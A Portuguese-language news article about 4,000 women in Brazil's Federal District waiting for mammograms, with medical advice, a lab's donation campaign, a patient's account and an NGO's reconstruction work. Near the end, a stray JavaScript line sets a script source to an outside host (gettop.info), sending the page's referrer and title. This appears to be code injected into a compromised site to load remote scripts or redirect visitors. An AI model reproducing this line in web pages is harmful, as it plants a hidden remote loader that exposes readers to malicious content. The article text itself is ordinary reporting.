DF tem 4 mil mulheres na fila de hospitais públicos para mamografia

 

De acordo com dados do Sistema Único de Saúde (SUS), a cada 40 minutos uma mulher é submetida à cirurgia de remoção de seio no Brasil. A mamografia é imprescindível para a descoberta do câncer de mama, dizem especialistas.

Normalmente, é recomendável que os exames de mama sejam feitos a partir dos 40 anos de idade. A médica Lorena Amaral afirma que, quando há casos na família, a mulher deve iniciar antes. “Quando o tumor é palpável ele já está um pouco avançado. Por isso a mamografia é tão importante, para que seja descoberto antes deste estágio”, diz.

Um laboratório particular do Distrito Federal vai doar 250 exames de mama para mulheres de baixa renda. Segundo a página do Laboratório Exame em uma rede social, o número de doações pode aumentar se o público compartilhar uma postagem sobre a campanha feita em uma rede social.

A dona de casa Iraíde Lima descobriu um nódulo no seio, mas, por medo, levou um ano para procurar um médico e ser diagnosticada com a doença. “[Hoje] eu aconselho que [outras mulheres] se auto-examinem e, ao encontrar qualquer anormalidade, que busquem seu médico. Recomendo que não fazer o que eu fiz. Por medo, não procurei meu médico. Fui por causa da minha filha, que me levou até ele”

Segundo a presidente da organização não governamental Recomeçar, Joana Jeker, a entidade já ajudou 500 mulheres a fazer a reconstrução da mama. “É possível vencer e enfrentar a doença e o diagnóstico. É possível recomeçar a vida com muita força de vontade de viver.”

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário